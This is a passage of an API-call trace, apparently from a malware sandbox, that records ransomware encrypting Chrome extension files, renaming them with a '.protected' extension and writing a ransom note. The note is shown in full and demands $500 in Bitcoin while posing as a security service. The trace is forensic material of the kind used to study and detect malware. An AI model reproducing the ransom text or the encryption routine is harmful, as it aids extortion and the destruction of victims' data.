(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.520] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.520] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.520] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.520] CloseHandle (hObject=0x164) returned 1 [0081.521] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.521] lstrcmpiW (lpString1="se", lpString2="Windows") returned -1 [0081.521] lstrcmpiW (lpString1="se", lpString2="Program Files") returned 1 [0081.521] lstrcmpiW (lpString1="se", lpString2="Program Files (x86)") returned 1 [0081.521] lstrcmpiW (lpString1="se", lpString2="$Recycle.bin") returned 1 [0081.521] lstrcmpiW (lpString1="se", lpString2="System Volume Information") returned -1 [0081.521] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se") returned 141 [0081.521] lstrcmpW (lpString1="se", lpString2=".") returned 1 [0081.521] lstrcmpW (lpString1="se", lpString2="..") returned 1 [0081.521] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\*") returned 143 [0081.521] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.521] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.521] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.521] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.521] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.521] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.521] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\.") returned 143 [0081.521] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.521] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.521] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.521] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.521] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.521] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.521] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.521] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\..") returned 144 [0081.521] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.521] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.521] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.521] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.521] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.521] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.521] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.521] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.521] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json") returned 155 [0081.521] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.521] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.521] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.521] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.522] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json") returned 155 [0081.522] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.522] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json") returned 155 [0081.522] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.522] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json") returned 155 [0081.522] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.522] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0081.523] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.523] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0081.523] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.523] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.523] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.523] CloseHandle (hObject=0x168) returned 1 [0081.523] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.protected") returned 165 [0081.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.protected")) returned 1 [0081.523] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.524] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.524] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\RESTORE_FILES.txt") returned 159 [0081.524] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.524] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.524] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.525] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.525] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.525] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.525] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.525] CloseHandle (hObject=0x164) returned 1 [0081.525] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.525] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0081.525] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0081.525] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0081.525] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0081.525] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0081.525] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk") returned 141 [0081.525] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0081.525] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0081.525] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\*") returned 143 [0081.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.525] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.525] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.525] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.525] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.525] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.525] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\.") returned 143 [0081.525] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.525] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.525] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.525] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.525] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.525] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.525] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.525] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\..") returned 144 [0081.525] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.525] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.526] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.526] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.526] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.526] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.526] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.526] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.526] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json") returned 155 [0081.526] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.526] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.526] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.526] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json") returned 155 [0081.526] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json") returned 155 [0081.526] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json") returned 155 [0081.526] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.526] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0081.527] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.527] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0081.527] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.527] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.527] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.528] CloseHandle (hObject=0x168) returned 1 [0081.528] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.protected") returned 165 [0081.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.protected")) returned 1 [0081.528] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.528] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.528] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\RESTORE_FILES.txt") returned 159 [0081.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.529] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.529] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.529] lstrlenA 